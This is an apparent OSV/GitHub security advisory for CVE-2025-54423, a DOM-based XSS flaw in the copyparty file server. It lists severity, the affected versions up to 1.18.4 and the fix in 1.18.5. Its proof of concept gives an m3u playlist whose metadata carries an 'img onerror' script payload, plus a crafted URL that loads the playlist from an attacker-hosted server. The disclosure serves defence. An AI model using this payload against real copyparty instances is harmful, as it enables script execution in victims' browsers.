GHSA-9q4r-x2hj-jmvr

Source

https://github.com/advisories/GHSA-9q4r-x2hj-jmvr

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-9q4r-x2hj-jmvr/GHSA-9q4r-x2hj-jmvr.json

JSON Data

https://api.test.osv.dev/v1/vulns/GHSA-9q4r-x2hj-jmvr

Aliases

CVE-2025-54423

Published

2025-07-28T16:41:44Z

Modified

2025-07-29T13:05:17.503233Z

Severity

5.4 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N CVSS Calculator

Summary

copyparty has DOM-Based XSS vulnerability when displaying multimedia metadata

Details

Summary

An unauthenticated attacker is able to execute arbitrary JavaScript code in a victim's browser due to improper sanitization of multimedia tags in music files, including m3u files.

Details

Multimedia metadata is rendered in the web-app without sanitization. This can be exploited in two ways:

a user which has the necessary permission for uploading files can upload a song with an artist-name such as <img src=x onerror=alert(document.domain)>
an unauthenticated user can trick another user into clicking a malicious URL, performing this same exploit using an externally-hosted m3u file

The CVE score and PoC is based on the m3u approach, which results in a higher severity.

PoC

Create a file named song.m3u with the following content. Host this file on an attacker-controlled web server.

#EXTM3U
#EXTINF:1,"><img src=x onerror=alert(document.domain)> - "><img src=x onerror=alert(document.domain)>
http://example.com/audio.mp3

Craft and share the malicious URL:

http://127.0.0.1:3923/#m3u=https://example.com/song.m3u

Impact

Any user that accesses this malicious URL is impacted.

Database specific

{
    "github_reviewed": true,
    "severity": "MODERATE",
    "github_reviewed_at": "2025-07-28T16:41:44Z",
    "cwe_ids": [
        "CWE-79"
    ],
    "nvd_published_at": "2025-07-28T20:17:48Z"
}

References

Affected packages

PyPI / copyparty

Package

Name: copyparty; View open source insights on deps.dev
Purl: pkg:pypi/copyparty

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

1.18.5

Affected versions

0.*

0.2.3

0.3.0

0.3.1

0.4.0

0.4.1

0.4.2

0.4.3

0.5.0

0.5.1

0.5.2

0.5.3

0.5.4

0.5.5

0.5.6

0.5.7

0.6.0

0.6.2

0.6.3

0.7.0

0.7.1

0.7.2

0.7.3

0.7.4

0.7.5

0.7.6

0.7.7

0.8.1

0.8.3

0.9.0

0.9.1

0.9.3

0.9.4

0.9.5

0.9.6

0.9.7

0.9.8

0.9.9

0.9.10

0.9.11

0.9.13

0.10.0

0.10.1

0.10.2

0.10.3

0.10.4

0.10.5

0.10.6

0.10.7

0.10.8

0.10.9

0.10.10

0.10.11

0.10.12

0.10.13

0.10.14

0.10.15

0.10.16

0.10.17

0.10.18

0.10.19

0.10.20

0.10.21

0.10.22

0.11.0

0.11.1

0.11.5

0.11.6

0.11.7

0.11.8

0.11.9

0.11.10

0.11.11

0.11.12

0.11.13

0.11.14

0.11.15

0.11.16

0.11.17

0.11.18

0.11.19

0.11.20

0.11.21

0.11.22

0.11.23

0.11.24

0.11.26

0.11.27

0.11.28

0.11.29

0.11.30

0.11.31

0.11.32

0.11.33

0.11.34

0.11.35

0.11.36

0.11.37

0.11.38

0.11.39

0.11.40

0.11.41

0.11.42

0.11.43

0.11.44

0.11.45

0.11.46

0.11.47

0.12.1

0.12.3

0.12.4

0.12.5

0.12.6

0.12.7

0.12.8

0.12.9

0.12.10

0.12.11

0.12.12

0.13.0

0.13.1

0.13.2

0.13.3

0.13.5

0.13.6

0.13.7

0.13.9

0.13.10

0.13.11

0.13.12

0.13.13

0.13.14

1.*

1.0.0

1.0.1

1.0.2

1.0.3

1.0.4

1.0.5

1.0.7

1.0.8

1.0.9

1.0.10

1.0.11

1.0.12

1.0.13

1.0.14

1.1.0

1.1.1

1.1.2

1.1.3

1.1.4

1.1.5

1.1.6

1.1.7

1.1.8

1.1.9

1.1.10

1.1.11

1.1.12

1.2.0

1.2.1

1.2.2

1.2.3

1.2.4

1.2.5

1.2.6

1.2.7

1.2.8

1.2.9

1.2.10

1.2.11

1.3.0

1.3.1

1.3.2

1.3.3

1.3.4

1.3.5

1.3.6

1.3.7

1.3.8

1.3.9

1.3.10

1.3.11

1.3.12

1.3.13

1.3.14

1.3.15

1.3.16

1.4.0

1.4.1

1.4.2

1.4.3

1.4.4

1.4.5

1.4.6

1.5.0

1.5.1

1.5.2

1.5.3

1.5.4

1.5.5

1.5.6

1.6.0

1.6.1

1.6.2

1.6.3

1.6.4

1.6.5

1.6.6

1.6.7

1.6.8

1.6.9

1.6.10

1.6.11

1.6.12

1.6.13

1.6.14

1.6.15

1.7.0

1.7.1

1.7.2

1.7.3

1.7.4

1.7.5

1.7.6

1.8.0

1.8.1

1.8.2

1.8.3

1.8.4

1.8.6

1.8.7

1.8.8

1.9.0

1.9.1

1.9.2

1.9.3

1.9.4

1.9.5

1.9.6

1.9.7

1.9.8

1.9.9

1.9.10

1.9.11

1.9.12

1.9.13

1.9.14

1.9.15

1.9.16

1.9.17

1.9.18

1.9.19

1.9.20

1.9.21

1.9.24

1.9.25

1.9.26

1.9.27

1.9.28

1.9.29

1.9.30

1.9.31

1.10.0

1.10.1

1.10.2

1.11.0

1.11.1

1.11.2

1.12.0

1.12.1

1.12.2

1.13.0

1.13.1

1.13.2

1.13.3

1.13.4

1.13.5

1.13.6

1.13.7

1.13.8

1.14.0

1.14.1

1.14.2

1.14.3

1.14.4

1.15.0

1.15.1

1.15.2

1.15.3

1.15.4

1.15.5

1.15.6

1.15.7

1.15.8

1.15.9

1.15.10

1.16.0

1.16.1

1.16.2

1.16.3

1.16.4

1.16.5

1.16.6

1.16.7

1.16.8

1.16.9

1.16.10

1.16.11

1.16.12

1.16.13

1.16.14

1.16.15

1.16.16

1.16.17

1.16.18

1.16.19

1.16.20

1.16.21

1.17.0

1.17.1

1.17.2

1.18.0

1.18.1

1.18.2

1.18.3

1.18.4

Database specific

{
    "last_known_affected_version_range": "<= 1.18.4"
}